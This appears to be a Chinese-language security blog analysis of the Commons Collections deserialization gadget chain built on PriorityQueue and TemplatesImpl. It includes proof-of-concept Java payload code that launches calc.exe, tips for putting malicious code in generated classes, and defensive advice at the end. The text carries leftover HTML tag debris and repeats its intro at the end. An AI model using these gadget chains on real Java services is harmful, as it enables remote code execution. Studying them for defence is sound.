Java反序列化漏洞：CommonsCollections利用链分析（下）<\/h1>

前言<\/h2>
本文深入分析Apache Commons Collections反序列化漏洞的另一种利用链，重点讲解基于`PriorityQueue<\/code>类的攻击方式。这是"玄铁重剑"系列的第二部分，延续上篇内容，揭示CommonsCollections反序列化漏洞的更多利用技巧。<\/p>`

核心利用链分析<\/h2>
利用链概述<\/h3>
本次分析的执行链如下：<\/p>
PriorityQueue.readObject()
-> PriorityQueue.heapify()
-> PriorityQueue.siftDown()
-> PriorityQueue.siftDownUsingComparator()
-> TransformingComparator.compare()
-> InvokerTransformer.transform()
<\/code><\/pre>
关键类说明<\/h3>

PriorityQueue<\/strong>：Java中的优先队列实现，基于堆数据结构<\/li>
TransformingComparator<\/strong>：Commons Collections中的比较器，可包装Transformer<\/li>
InvokerTransformer<\/strong>：Commons Collections中的Transformer实现，可通过反射调用方法<\/li>
<\/ol>
POC构造过程<\/h2>
基础调用结构<\/h3>
首先构造基本的TransformingComparator.compare()<\/code>调用结构：<\/p>
public<\/span> static<\/span> void<\/span> main<\/span>(<\/span>final<\/span> String[]<\/span> args)<\/span> throws<\/span> Exception {<\/span>
<\/span><\/span>    runcompare();<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span>
<\/span><\/span>public<\/span> static<\/span> void<\/span> runcompare<\/span>(){<\/span>
<\/span><\/span>    InvokerTransformer invokerTransformer=<\/span> getInvokerTransformer();<\/span>
<\/span><\/span>    TransformingComparator transformingComparator =<\/span> new<\/span> TransformingComparator(<\/span>invokerTransformer);<\/span>
<\/span><\/span>    Runtime runtime1 =<\/span> Runtime.<\/span>getRuntime<\/span>();<\/span>
<\/span><\/span>    transformingComparator.<\/span>compare<\/span>(<\/span>runtime1,<\/span> null<\/span>);<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span>
<\/span><\/span>public<\/span> static<\/span> InvokerTransformer getInvokerTransformer<\/span>(){<\/span>
<\/span><\/span>    String[]<\/span> cmds =<\/span> new<\/span> String[]{<\/span>"calc.exe"<\/span>};<\/span>
<\/span><\/span>    InvokerTransformer invokerTransformer =<\/span> new<\/span> InvokerTransformer(<\/span>
<\/span><\/span>        "exec"<\/span>,<\/span> 
<\/span><\/span>        new<\/span> Class[]{<\/span>String[].<\/span>class<\/span>},<\/span> 
<\/span><\/span>        new<\/span> Object[]{<\/span>cmds}<\/span>
<\/span><\/span>    );<\/span>
<\/span><\/span>    return<\/span> invokerTransformer;<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>完整POC尝试<\/h3>
尝试构造完整的PriorityQueue利用链：<\/p>
public<\/span> Queue<<\/span>Object><\/span> getObject<\/span>(<\/span>final<\/span> String command)<\/span> throws<\/span> Exception {<\/span>
<\/span><\/span>    PriorityQueue queue =<\/span> getPriorityQueue();<\/span>
<\/span><\/span>    return<\/span> queue;<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span>
<\/span><\/span>public<\/span> static<\/span> PriorityQueue getPriorityQueue<\/span>()<\/span> throws<\/span> Exception {<\/span>
<\/span><\/span>    TransformingComparator transformingComparator =<\/span> getTransformingComparator();<\/span>
<\/span><\/span>    PriorityQueue priorityQueue =<\/span> new<\/span> PriorityQueue(<\/span>1<\/span>,<\/span> transformingComparator);<\/span>
<\/span><\/span>    priorityQueue.<\/span>add<\/span>(<\/span>Runtime.<\/span>getRuntime<\/span>());<\/span>
<\/span><\/span>    return<\/span> priorityQueue;<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span>
<\/span><\/span>public<\/span> static<\/span> TransformingComparator getTransformingComparator<\/span>(){<\/span>
<\/span><\/span>    InvokerTransformer invokerTransformer=<\/span> getInvokerTransformer();<\/span>
<\/span><\/span>    TransformingComparator transformingComparator =<\/span> new<\/span> TransformingComparator(<\/span>invokerTransformer);<\/span>
<\/span><\/span>    return<\/span> transformingComparator;<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span>
<\/span><\/span>public<\/span> static<\/span> InvokerTransformer getInvokerTransformer<\/span>(){<\/span>
<\/span><\/span>    String[]<\/span> cmds =<\/span> new<\/span> String[]{<\/span>"calc.exe"<\/span>};<\/span>
<\/span><\/span>    InvokerTransformer invokerTransformer =<\/span> new<\/span> InvokerTransformer(<\/span>
<\/span><\/span>        "exec"<\/span>,<\/span> 
<\/span><\/span>        new<\/span> Class[]{<\/span>String[].<\/span>class<\/span>},<\/span> 
<\/span><\/span>        new<\/span> Object[]{<\/span>cmds}<\/span>
<\/span><\/span>    );<\/span>
<\/span><\/span>    return<\/span> invokerTransformer;<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>问题发现<\/strong>：Runtime类不可序列化，直接使用会导致序列化失败。<\/p>
解决方案：使用TemplatesImpl类<\/h3>
由于Runtime类不可序列化，转而使用TemplatesImpl<\/code>类作为替代：<\/p>
final<\/span> Object templates =<\/span> Gadgets.<\/span>createTemplatesImpl<\/span>(<\/span>command);<\/span>
<\/span><\/span>final<\/span> InvokerTransformer transformer =<\/span> new<\/span> InvokerTransformer(<\/span>"toString"<\/span>,<\/span> new<\/span> Class[<\/span>0<\/span>],<\/span> new<\/span> Object[<\/span>0<\/span>]);<\/span>
<\/span><\/span>final<\/span> PriorityQueue<<\/span>Object><\/span> queue =<\/span> new<\/span> PriorityQueue<<\/span>Object>(<\/span>2<\/span>,<\/span>new<\/span> TransformingComparator(<\/span>transformer));<\/span>
<\/span><\/span>queue.<\/span>add<\/span>(<\/span>templates);<\/span>
<\/span><\/span>queue.<\/span>add<\/span>(<\/span>templates);<\/span>
<\/span><\/span>Reflections.<\/span>setFieldValue<\/span>(<\/span>transformer,<\/span> "iMethodName"<\/span>,<\/span> "newTransformer"<\/span>);<\/span>
<\/span><\/span>final<\/span> Object[]<\/span> queueArray =<\/span> (<\/span>Object[])<\/span> Reflections.<\/span>getFieldValue<\/span>(<\/span>queue,<\/span> "queue"<\/span>);<\/span>
<\/span><\/span>return<\/span> queue;<\/span>
<\/span><\/span><\/code><\/pre>关键点<\/strong>：<\/p>

使用TemplatesImpl.newTransformer<\/code>而非getTransletInstance<\/code>（因为后者是private方法）<\/li>
通过反射修改iMethodName<\/code>字段，将初始的"toString"改为"newTransformer"<\/li>
<\/ol>
利用ClassPool生成恶意类<\/h2>
使用ClassPool<\/code>动态生成恶意类：<\/p>
public<\/span> class<\/span> Main<\/span> {<\/span>
<\/span><\/span>    public<\/span> static<\/span> void<\/span> main<\/span>(<\/span>String[]<\/span> args){<\/span>
<\/span><\/span>        try<\/span> {<\/span>
<\/span><\/span>            ClassPool pool =<\/span> ClassPool.<\/span>getDefault<\/span>();<\/span>
<\/span><\/span>            CtClass ctClass =<\/span> pool.<\/span>makeClass<\/span>(<\/span>"net.codersec.Person"<\/span>);<\/span>
<\/span><\/span>            CtField ctField =<\/span> new<\/span> CtField(<\/span>CtClass.<\/span>intType<\/span>,<\/span> "name"<\/span>,<\/span> ctClass);<\/span>
<\/span><\/span>            ctField.<\/span>setModifiers<\/span>(<\/span>Modifier.<\/span>PUBLIC<\/span>);<\/span>
<\/span><\/span>            ctClass.<\/span>addField<\/span>(<\/span>ctField);<\/span>
<\/span><\/span>            byte<\/span>[]<\/span> bytes =<\/span> ctClass.<\/span>toBytecode<\/span>();<\/span>
<\/span><\/span>            FileOutputStream fileOutputStream =<\/span> new<\/span> FileOutputStream(<\/span>new<\/span> File(<\/span>"Person.class"<\/span>));<\/span>
<\/span><\/span>            fileOutputStream.<\/span>write<\/span>(<\/span>bytes);<\/span>
<\/span><\/span>            fileOutputStream.<\/span>close<\/span>();<\/span>
<\/span><\/span>        }<\/span> catch<\/span> (<\/span>Exception e)<\/span> {<\/span>
<\/span><\/span>            e.<\/span>printStackTrace<\/span>();<\/span>
<\/span><\/span>        }<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>技巧<\/strong>：<\/p>

可以在构造函数中加入恶意代码<\/li>
也可以通过insertAfter()<\/code>在构造函数运行后执行恶意代码<\/li>
<\/ol>
替代利用链分析<\/h2>
除了InvokerTransformer.transform()<\/code>，还可以利用InstantiateTransformer.transform()<\/code>：<\/p>
PriorityQueue.readObject()
-> PriorityQueue.heapify()
-> PriorityQueue.siftDown()
-> PriorityQueue.siftDownUsingComparator()
-> TransformingComparator.compare()
-> InstantiateTransformer.transform()
-> com.sun.org.apache.xalan.internal.xsltc.trax.TrAXFilter.newInstance()
-> TemplatesImpl.getTransletInstance()
-> Class.newInstance()
<\/code><\/pre>
特点<\/strong>：<\/p>

调用链更长更复杂<\/li>
利用了TrAXFilter<\/code>构造函数中调用的TemplatesImpl.getTransletInstance()<\/code><\/li>
<\/ol>
防御建议<\/h2>

升级Commons Collections到安全版本（3.2.2+或4.1+）<\/li>
使用Java反序列化过滤器（ObjectInputFilter）<\/li>
避免反序列化不可信数据<\/li>
考虑使用替代的序列化框架（如JSON、Protocol Buffers等）<\/li>
<\/ol>
总结<\/h2>
本文详细分析了CommonsCollections反序列化漏洞的另一种利用链，重点讲解了基于PriorityQueue<\/code>和TemplatesImpl<\/code>的攻击方式。通过动态生成恶意类、反射修改字段等技术，攻击者可以绕过Runtime不可序列化的限制，实现远程代码执行。防御此类漏洞需要综合应用多种安全措施。<\/p>

Java反序列化漏洞：CommonsCollections利用链分析（下）<\/h1>

前言<\/h2> 本文深入分析Apache Commons Collections反序列化漏洞的另一种利用链，重点讲解基于PriorityQueue<\/code>类的攻击方式。这是"玄铁重剑"系列的第二部分，延续上篇内容，揭示CommonsCollections反序列化漏洞的更多利用技巧。<\/p>

POC构造过程<\/h2>

前言<\/h2>
本文深入分析Apache Commons Collections反序列化漏洞的另一种利用链，重点讲解基于`PriorityQueue<\/code>类的攻击方式。这是"玄铁重剑"系列的第二部分，延续上篇内容，揭示CommonsCollections反序列化漏洞的更多利用技巧。<\/p>`